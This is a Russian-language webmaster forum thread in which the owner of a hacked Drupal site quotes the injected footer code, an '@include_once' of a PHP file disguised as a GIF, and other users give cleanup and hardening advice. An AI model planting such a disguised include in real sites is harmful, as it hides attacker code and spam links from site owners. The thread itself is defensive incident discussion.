X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали сайт на Drupal, как избавится от вируса
jjoret
jjoret
Topic Starter сообщение 9.7.2014, 3:14; Ответить: jjoret
Сообщение #1


Здравствуйте. Недавно взломали мой сайт на друпале, а я думал самая безопасная кмс, вставили код в футер, на некоторых страницах отображались ссылки с околоссылочным текстом в маленьком шрифте на том месте, очень похоже на биржу ссылок. Вот код:
Код
<?php
if(render($page['footer'])){
print '<div class="footer"><div class="wrapper">'.render($page['footer']); @include_once($_SERVER['DOCUMENT_ROOT'].'/modules/color/header.gif'); print '</div></div>';
}
if(render($page['hide'])){
print render($page['hide']);
}
?>

собственно вирус: @include_once($_SERVER['DOCUMENT_ROOT'].'/modules/color/header.gif'
Этот гиф-файл зашифрован под пхп-код. В общем я его удалил, но вопрос возник: одно дело залить файл на хостинг, другое - изменить код и вставить туда ссылку на вирус-файл. То есть должен быть еще где-то загрузчик, с помощью которого взломщик может закачивать все что хочет. К знатокам Друпала, кто что думает по этому поводу? и как это все удалить и не допустить впредь?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DVORYAN
DVORYAN
сообщение 9.7.2014, 4:34; Ответить: DVORYAN
Сообщение #2


Какая версия Drupal, у меня старые версии взламывали, после обновления ядра и всех модулей взломы прекратились.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 9.7.2014, 6:18; Ответить: kagtus
Сообщение #3


айболитом проверьте и движок/модули обновите.

P.S. самая безопасная - не значит что ее нельзя взломать ;)


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Infacto
Infacto
сообщение 9.7.2014, 9:40; Ответить: Infacto
Сообщение #4


Была такая же беда на ВП, удалил файл, сменил пароли(фтп, хостинг, админка), удалил код, просмотрел все файлы с датой изменения которые я не вносил. Больше такого не было.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
jjoret
jjoret
Topic Starter сообщение 9.7.2014, 14:44; Ответить: jjoret
Сообщение #5


А кто-нибудь догодывается как взломщик смог поменять код в файле шаблона?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Infacto
Infacto
сообщение 9.7.2014, 15:41; Ответить: Infacto
Сообщение #6


jjoret,
Думаю через плагин, плагины тоже обновлял. А может и через хостинг (у меня от верблюда)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 9.7.2014, 16:20; Ответить: Rampage
Сообщение #7


ищите шелл изначально айболитом как посоветовали выше, если на одном акаунте есть еще сайты по соседству вполне могли получить доступ через них, ну и после чистки грамотно выставить права


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
webpavilion
webpavilion
сообщение 9.7.2014, 16:23; Ответить: webpavilion
Сообщение #8


Если ломанули именно drupal, а не соседний сайт или пароль к FTP и вам не мстит один из бывших создателей, то с вероятностью в 99.9% процента стоит какая нибудь древность которую нужно обновить было года полтора назад. В стоковых эксплоит паках максимум что ломаеться по ядру до 7.12 и 6.24 и то там с оговорками и удобным стечением обстоятельств.

А еще может собрали так криворуко что анонимам можно php прямо из формы комментариев исполнять или бекдор залили на всякий.

А так да, самая безопасная.


--------------------
Не ведитесь, cамопис это почти всегда плохо!

Делаю сайты на Drupal 7.x
(очень дорого)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
jjoret
jjoret
Topic Starter сообщение 9.7.2014, 18:14; Ответить: jjoret
Сообщение #9


Допустим я удалил вирус, но мне нужно быть уверенным, что в дальнейшем не случится подобного, ведь это я заметил чисто случайно. Может есть какая-то программа или сервис чтобы автоматически чекал ссылки со всех страниц сайта, типа как Xenu?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Drupal_way
Drupal_way
сообщение 12.7.2014, 14:23; Ответить: Drupal_way
Сообщение #10


Чтобы это не повторилось - обновляйте друпал и модуля. Проверка ссылок тут http://www.linkpad.ru/


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
23 hollywooduk 5096 27.3.2024, 10:43
автор: hollywooduk
Открытая тема (нет новых ответов) Тысячи ботовых переходов на сайт
18 Suagaring 4538 26.3.2024, 21:42
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Блог: городской сми сайт в Прибалтике
23 kapusta1 3534 24.3.2024, 22:02
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы[Услуги] Баннер/Графика/Сайт
238 FillPlay 179394 23.3.2024, 16:31
автор: freeax
Открытая тема (нет новых ответов) Пишет кто отзывы на сайт в янднекс с разных аккаунтах
1 TenDemon_rs 1130 22.3.2024, 13:18
автор: writer80


 



RSS Текстовая версия Сейчас: 29.3.2024, 10:16
Дизайн